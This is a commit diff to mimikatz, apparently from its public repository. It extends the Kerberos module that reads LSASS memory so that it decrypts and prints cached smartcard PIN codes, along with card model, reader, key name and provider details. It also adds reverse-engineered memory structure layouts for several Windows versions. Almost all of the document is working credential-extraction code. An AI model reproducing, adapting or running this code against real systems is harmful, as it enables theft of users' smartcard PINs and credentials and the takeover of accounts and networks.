SmartCard informations, fixed PIN code decryption on Windows 2003

dptechma · Apr 6, 2015 · 4ac9a18 · 4ac9a18
1 parent 880b472
commit 4ac9a18
Show file tree

Hide file tree

Showing 3 changed files with 169 additions and 18 deletions.
diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
@@ -703,16 +703,30 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
 		}
 		else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE)
 		{
+			kprintf(L"\n\t * Smartcard"); 
 			if(mesCreds->UserName.Buffer)
 			{
 				if(kull_m_string_getUnicodeString(&mesCreds->UserName, cLsass.hLsassMem))
 				{
 					if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
 						(*lsassLocalHelper->pLsaUnprotectMemory)(mesCreds->UserName.Buffer, mesCreds->UserName.MaximumLength);
-					kprintf(L"\n\t * PIN code : %wZ", &mesCreds->UserName);
+					kprintf(L"\n\t     PIN code : %wZ", &mesCreds->UserName);
 					LocalFree(mesCreds->UserName.Buffer);
 				}
 			}
+			if(mesCreds->Domaine.Buffer)
+			{
+				kprintf(
+					L"\n\t     Model    : %s"
+					L"\n\t     Reader   : %s"
+					L"\n\t     Key name : %s"
+					L"\n\t     Provider : %s",
+					(PBYTE) mesCreds->Domaine.Buffer + sizeof(KIWI_KERBEROS_CSP_NAMES) + sizeof(wchar_t) * ((PKIWI_KERBEROS_CSP_NAMES) mesCreds->Domaine.Buffer)->offsetToCard,
+					(PBYTE) mesCreds->Domaine.Buffer + sizeof(KIWI_KERBEROS_CSP_NAMES) + sizeof(wchar_t) * ((PKIWI_KERBEROS_CSP_NAMES) mesCreds->Domaine.Buffer)->offsetToReader,
+					(PBYTE) mesCreds->Domaine.Buffer + sizeof(KIWI_KERBEROS_CSP_NAMES) + sizeof(wchar_t) * ((PKIWI_KERBEROS_CSP_NAMES) mesCreds->Domaine.Buffer)->offsetToSerial,
+					(PBYTE) mesCreds->Domaine.Buffer + sizeof(KIWI_KERBEROS_CSP_NAMES) + sizeof(wchar_t) * ((PKIWI_KERBEROS_CSP_NAMES) mesCreds->Domaine.Buffer)->offsetToProvider
+					);
+			}
 		}
 		else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
 		{

diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
@@ -42,7 +42,7 @@ const KERB_INFOS kerbHelper[] = {
 			sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, Tickets_2),
 			sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, Tickets_3),
 		},
-		sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, pinCode),
+		sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, SmartcardInfos),
 		sizeof(LIST_ENTRY) + sizeof(KIWI_KERBEROS_LOGON_SESSION_51),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_51, ServiceName),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_51, TargetName),
@@ -65,6 +65,9 @@ const KERB_INFOS kerbHelper[] = {
 		sizeof(KIWI_KERBEROS_KEYS_LIST_5),
 		FIELD_OFFSET(KERB_HASHPASSWORD_5, generic),
 		sizeof(KERB_HASHPASSWORD_5),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_51, sizeOfCurrentStruct),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_51, names),
+		sizeof(KIWI_KERBEROS_CSP_INFOS_51),
 	},
 	{
 		sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
@@ -74,7 +77,7 @@ const KERB_INFOS kerbHelper[] = {
 			sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, Tickets_2),
 			sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, Tickets_3),
 		},
-		sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, pinCode),
+		sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, SmartcardInfos),
 		sizeof(LIST_ENTRY) + sizeof(KIWI_KERBEROS_LOGON_SESSION),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_52, ServiceName),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_52, TargetName),
@@ -97,6 +100,9 @@ const KERB_INFOS kerbHelper[] = {
 		sizeof(KIWI_KERBEROS_KEYS_LIST_5),
 		FIELD_OFFSET(KERB_HASHPASSWORD_5, generic),
 		sizeof(KERB_HASHPASSWORD_5),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_51, sizeOfCurrentStruct),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_51, names),
+		sizeof(KIWI_KERBEROS_CSP_INFOS_51),
 	},
 	{
 		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
@@ -106,7 +112,7 @@ const KERB_INFOS kerbHelper[] = {
 			FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, Tickets_2),
 			FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, Tickets_3),
 		},
-		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, pinCode),
+		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, SmartcardInfos),
 		sizeof(KIWI_KERBEROS_LOGON_SESSION),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_60, ServiceName),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_60, TargetName),
@@ -129,6 +135,9 @@ const KERB_INFOS kerbHelper[] = {
 		sizeof(KIWI_KERBEROS_KEYS_LIST_6),
 		FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
 		sizeof(KERB_HASHPASSWORD_6),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, sizeOfCurrentStruct),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, names),
+		sizeof(KIWI_KERBEROS_CSP_INFOS_60),
 	},
 	{
 		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
@@ -138,7 +147,7 @@ const KERB_INFOS kerbHelper[] = {
 			FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, Tickets_2),
 			FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, Tickets_3),
 		},
-		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, pinCode),
+		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, SmartcardInfos),
 		sizeof(KIWI_KERBEROS_LOGON_SESSION),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, ServiceName),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TargetName),
@@ -161,6 +170,9 @@ const KERB_INFOS kerbHelper[] = {
 		sizeof(KIWI_KERBEROS_KEYS_LIST_6),
 		FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
 		sizeof(KERB_HASHPASSWORD_6),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_61, sizeOfCurrentStruct),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_61, names),
+		sizeof(KIWI_KERBEROS_CSP_INFOS_61),
 	},
 	{
 		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
@@ -170,7 +182,7 @@ const KERB_INFOS kerbHelper[] = {
 			FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, Tickets_2),
 			FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, Tickets_3),
 		},
-		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, pinCode),
+		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, SmartcardInfos),
 		sizeof(KIWI_KERBEROS_LOGON_SESSION_10),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, ServiceName),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TargetName),
@@ -193,6 +205,9 @@ const KERB_INFOS kerbHelper[] = {
 		sizeof(KIWI_KERBEROS_KEYS_LIST_6),
 		FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
 		sizeof(KERB_HASHPASSWORD_6),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, sizeOfCurrentStruct),
+		FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, names),
+		sizeof(KIWI_KERBEROS_CSP_INFOS_10),
 	},
 };
 
@@ -233,14 +248,33 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_generic(IN PKIWI_BASIC_SECU
 
 void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS LocalKerbSession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
 {
-	UNICODE_STRING pinCode;
+	KIWI_GENERIC_PRIMARY_CREDENTIAL creds;
+	PBYTE infosCsp;
 	KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
-	KULL_M_MEMORY_ADDRESS aLocalMemory = {&pinCode, &hLocalMemory}, aLsassMemory = {*(PUNICODE_STRING *) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetPin), pData->cLsass->hLsassMem};
+	KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {*(PVOID *) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetSmartCard), pData->cLsass->hLsassMem};
 
 	kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0);
 	if(aLsassMemory.address)
-		if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(UNICODE_STRING)))
-			kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0));
+	{
+		if(infosCsp = (PBYTE) LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structCspInfosSize))
+		{
+			aLocalMemory.address = infosCsp;
+			if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, kerbHelper[KerbOffsetIndex].structCspInfosSize))
+			{
+				creds.UserName = *(PUNICODE_STRING) infosCsp;
+				creds.Domaine.Length = (USHORT)	(*(PDWORD) (infosCsp + kerbHelper[KerbOffsetIndex].offsetSizeOfCurrentStruct) - (kerbHelper[KerbOffsetIndex].offsetNames - kerbHelper[KerbOffsetIndex].offsetSizeOfCurrentStruct));
+				if(creds.Domaine.Buffer = (PWSTR) LocalAlloc(LPTR, creds.Domaine.Length))
+				{
+					aLsassMemory.address = (PBYTE) aLsassMemory.address + kerbHelper[KerbOffsetIndex].offsetNames;
+					aLocalMemory.address = creds.Domaine.Buffer;
+					if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, creds.Domaine.Length))
+						kuhl_m_sekurlsa_genericCredsOutput(&creds, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_2K3) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0));
+					LocalFree(creds.Domaine.Buffer);
+				}
+			}
+			LocalFree(infosCsp);
+		}
+	}
 }
 
 const wchar_t * KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[] = {L"Ticket Granting Service", L"Client Ticket ?", L"Ticket Granting Ticket",};

diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h
@@ -44,8 +44,9 @@ typedef struct _KERB_INFOS {
 	LONG	offsetLuid;
 	LONG	offsetCreds;
 	LONG	offsetTickets[3];
-	LONG	offsetPin;
+	LONG	offsetSmartCard;
 	SIZE_T	structSize;
+
 	LONG	offsetServiceName;
 	LONG	offsetTargetName;
 	LONG	offsetDomainName;
@@ -63,12 +64,110 @@ typedef struct _KERB_INFOS {
 	LONG	offsetTicket;
 	LONG	offsetTicketKvno;
 	SIZE_T	structTicketSize;
+
 	LONG	offsetKeyList;
 	SIZE_T	structKeyListSize;
+
 	LONG	offsetHashGeneric;
 	SIZE_T	structKeyPasswordHashSize;
+
+	LONG	offsetSizeOfCurrentStruct;
+	LONG	offsetNames;
+	SIZE_T	structCspInfosSize;
 } KERB_INFOS, *PKERB_INFOS;
 
+typedef struct _KIWI_KERBEROS_CSP_NAMES {
+	DWORD offsetToCard;
+	DWORD offsetToReader;
+	DWORD offsetToSerial;
+	DWORD offsetToProvider;
+	//...
+} KIWI_KERBEROS_CSP_NAMES, *PKIWI_KERBEROS_CSP_NAMES;
+
+typedef struct _KIWI_KERBEROS_CSP_INFOS_51 {
+	LSA_UNICODE_STRING PinCode;
+	PVOID unk0;
+	PVOID unk1;
+	PVOID CertificateInfos;
+	PVOID unk2;
+	PVOID unk3;
+	DWORD sizeOfNextStruct;
+	DWORD sizeOfCurrentStruct;
+	PVOID unkCSP; // ?,
+	KIWI_KERBEROS_CSP_NAMES names;
+} KIWI_KERBEROS_CSP_INFOS_51, *PKIWI_KERBEROS_CSP_INFOS_51;
+
+typedef struct _KIWI_KERBEROS_CSP_INFOS_60 {
+	LSA_UNICODE_STRING PinCode;
+	PVOID unk0;
+	PVOID unk1;
+	PVOID CertificateInfos;
+	PVOID unk2;
+#ifdef _M_IX86
+	DWORD		unkAlign0;
+#endif
+	DWORD unk3_size;
+	DWORD sizeOfNextStruct;
+	DWORD unk4;
+	DWORD sizeOfCurrentStruct;
+	DWORD unk5;
+	PVOID unkCSP; // ?,
+#ifdef _M_IX86
+	DWORD		unkAlign1;
+#endif
+	DWORD unk6;
+	DWORD unk7;
+	KIWI_KERBEROS_CSP_NAMES names;
+} KIWI_KERBEROS_CSP_INFOS_60, *PKIWI_KERBEROS_CSP_INFOS_60;
+
+typedef struct _KIWI_KERBEROS_CSP_INFOS_61 {
+	LSA_UNICODE_STRING PinCode;
+	PVOID unk0;
+	PVOID unk1;
+	PVOID CertificateInfos;
+	PVOID unk2;
+	PVOID unk3;
+#ifdef _M_X64
+	DWORD		unkAlign0;
+#endif
+	DWORD unk4_size;
+	DWORD sizeOfNextStruct;
+	DWORD unk5;
+	DWORD sizeOfCurrentStruct;
+	DWORD unk6;
+	PVOID unkCSP; // ?,
+#ifdef _M_IX86
+	DWORD		unkAlign1;
+#endif
+	DWORD unk7;
+	DWORD unk8;
+	KIWI_KERBEROS_CSP_NAMES names;
+} KIWI_KERBEROS_CSP_INFOS_61, *PKIWI_KERBEROS_CSP_INFOS_61;
+
+typedef struct _KIWI_KERBEROS_CSP_INFOS_10 {
+	LSA_UNICODE_STRING PinCode;
+	PVOID unk0;
+	PVOID unk1;
+	PVOID CertificateInfos;
+	PVOID unk2;
+	PVOID unk3;
+	DWORD unk4;
+#ifdef _M_X64
+	DWORD		unkAlign0;
+#endif
+	DWORD unk5_size;
+	DWORD sizeOfNextStruct;
+	DWORD sizeOfCurrentStruct;
+	DWORD unk5;
+	PVOID unkCSP; // ?,
+#ifdef _M_IX86
+	DWORD		unkAlign1;
+#endif
+	DWORD unk7;
+	DWORD unk8;
+	KIWI_KERBEROS_CSP_NAMES names;
+} KIWI_KERBEROS_CSP_INFOS_10, *PKIWI_KERBEROS_CSP_INFOS_10;
+
 typedef struct _KIWI_KERBEROS_LOGON_SESSION_51 {
 	ULONG		UsageCount;
 	LIST_ENTRY	unk0;
@@ -104,7 +203,7 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION_51 {
 	LIST_ENTRY	Tickets_1;
 	LIST_ENTRY	Tickets_2;
 	LIST_ENTRY	Tickets_3;
-	PUNICODE_STRING pinCode;	// not only PIN (CSP Info)
+	PVOID		SmartcardInfos;
 } KIWI_KERBEROS_LOGON_SESSION_51, *PKIWI_KERBEROS_LOGON_SESSION_51;
 
 typedef struct _KIWI_KERBEROS_LOGON_SESSION {
@@ -144,7 +243,7 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION {
 	FILETIME	unk25;
 	LIST_ENTRY	Tickets_3;
 	FILETIME	unk26;
-	PUNICODE_STRING pinCode;	// not only PIN (CSP Info)
+	PVOID		SmartcardInfos;
 } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
 
 typedef struct _KIWI_KERBEROS_LOGON_SESSION_10 {
@@ -176,15 +275,19 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION_10 {
 	PVOID		unk19;
 	PVOID		unk20;
 	PVOID		unk21;
-	PVOID		pKeyList;
+	PVOID		unk22;
 	PVOID		unk23;
+	PVOID		unk24;
+	PVOID		unk25;
+	PVOID		pKeyList;
+	PVOID		unk26;
 	LIST_ENTRY	Tickets_1;
-	FILETIME	unk24;
+	FILETIME	unk27;
 	LIST_ENTRY	Tickets_2;
-	FILETIME	unk25;
+	FILETIME	unk28;
 	LIST_ENTRY	Tickets_3;
-	FILETIME	unk26;
-	PUNICODE_STRING pinCode;	// not only PIN (CSP Info)
+	FILETIME	unk29;
+	PVOID		SmartcardInfos;
 } KIWI_KERBEROS_LOGON_SESSION_10, *PKIWI_KERBEROS_LOGON_SESSION_10;
 
 typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_51 {